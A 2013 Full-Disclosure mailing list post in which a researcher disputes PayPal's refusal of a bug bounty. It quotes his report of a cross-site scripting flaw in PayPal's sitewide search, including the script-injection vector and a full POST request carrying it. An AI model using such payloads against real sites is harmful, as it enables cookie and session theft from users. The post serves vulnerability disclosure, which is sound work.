PayPal Bug Bounty Controversy - I found the XSS first: They still didn't pay me

[Shubham Shah <shahshubham369 () gmail com>]

Heya everyone,
*On the 11th of May, 2013, I reported an XSS that affected the very same 
field that Kugler reported, on the same domain of "paypal.com"* - 
However, I too did not receive a bug bounty.
My name is Shubham Shah, also a security researcher. And coincidentally 
but similarly to Robert Kugler. I too found a cross site scripting 
vulnerability on PayPal's "sitewide-search" module. My exploit was 
similar to his, it affected the same parameters except I had used an 
alternate vector - after fiddling with the search system for some time. 
The real controversy is however, I am *under 18 years old* and I, in the 
past have received money from their program under my older siblings 
PayPal account, with permission. When I reported the XSS pretty much the 
same as Kugler reported, I was "not eligible for a bounty" because 
"Another researcher already discovered the bug". Please take a look at 
the attached emails and screenshots.

Here is what I sent to the Site Security team via their PGP portal:
====================================================

To Paypal Site Security Team,
Recently I have discovered an XSS vulnerability which affects the wide majority of Paypal.com/* This XSS vulnerability is a POST 
type, on the affected script "searchscr?cmd=_sitewide-search"
Affected domains:
https://www.paypal.com/*/cgi-bin/searchscr?cmd=_sitewide-search
(The * indicates any country code)
for example:
https://www.paypal.com/au/cgi-bin/searchscr?cmd=_sitewide-search
https://www.paypal.com/ie/cgi-bin/searchscr?cmd=_sitewide-search
https://www.paypal.com/de/cgi-bin/searchscr?cmd=_sitewide-search
etc.

The XSS vector successfully executes on Internet Explorer and Firefox (newest builds). It does not execute on Chrome, 
but it is possible to create a custom vector to do so. If needed, I can create such a vector.

XSS Vector: '"<script >alert(document.cookie)</script> The bypass used is the ['"] in front of any HTML or script 
injection (without the square brackets)

This exploit has the capability of stealing a large number of user cookies in a short period of time with cookie 
stealers. If needed I can also provide a PoC for this. This can be done stealthily and would cause major mayhem if 
exploited!

Here is some proof of concept images:
http://pasteboard.co/2lU54Wuj.png  (PNG file hosted on pasteboard.co) - document.cookie xss on firefox

Here is my personal HTTP Headers for making this exploit execute:

POSThttps://www.paypal.com/au/cgi-bin/searchscr?cmd=_sitewide-search  1.1
Host:www.paypal.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:20.0) Gecko/20100101 Firefox/20.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer:https://www.paypal.com/au/cgi-bin/searchscr?cmd=_sitewide-search
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 369
locale_val=en_AU&qrystr_val=%27%22%3Cscript+%3Ealert%28document.cookie%29%3C%2Fscript%3E&countstr_val=AU&serverame_val=www.paypal.com&searchResultUrlsCount_val=&queryString_acInput=%27%22%3Cscript+%3Ealert%28document.cookie%29%3C%2Fscript%3E&queryString=%27%22%3Cscript+%3Ealert%28document.cookie%29%3C%2Fscript%3E&buttonSearch=Search&beta_user=false&form_charset=UTF-8

Thank you for your time in reading this, Shubham Shah

====================================================

Screenshots to prove date of submission and actual message:
http://pbrd.co/18ugpSY <= Date submitted proof
http://pbrd.co/18ugFRZ <= Proof of message

On 05/13/2013 7:47 AM I got told by paypal that:
====================================================

Hi Shubham,

We regret to inform you that your bug submission was not eligible for a bounty for the following reason.  Another 
researcher already discovered the bug.

Thank you for your participation. We take pride in keeping PayPal the safer place for online payment.

Thank you,
PayPal Security Team

====================================================
Once again, here are some screenshots:
http://pbrd.co/18uhtGD <= Proof of date I submitted it
http://pbrd.co/18uhMkI <= Proof of message - As I could not take a print 
screen of the far right side, I included the barebones - print version 
of the message - so others can verify the date I received the response.

Thanks for reading through,
I actually didn't get anything from PayPal similar to Robert, but I was 
able to report the vulnerability 8 days earlier than Robert - and still 
did not receive any acknowledgement.
Frankly, I was okay with it and moved on. I do not actually have much 
against the bounty as I have been paid numerous times. PayPal has 
honoured many of my vulnerabilities. However, I can tell you that 
recently none of my security submissions have been honoured - they state 
that all my newer submissions have been already reported - I have no 
actual way of verifying if they have or not, so I just move on and 
continue pentesting with spirit

Also, Robert, I am amazed by your work done with security regarding 
Mozilla! They were awesome finds! Solid stuff man, I hope one day that I 
can move onto learning more about application security.
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/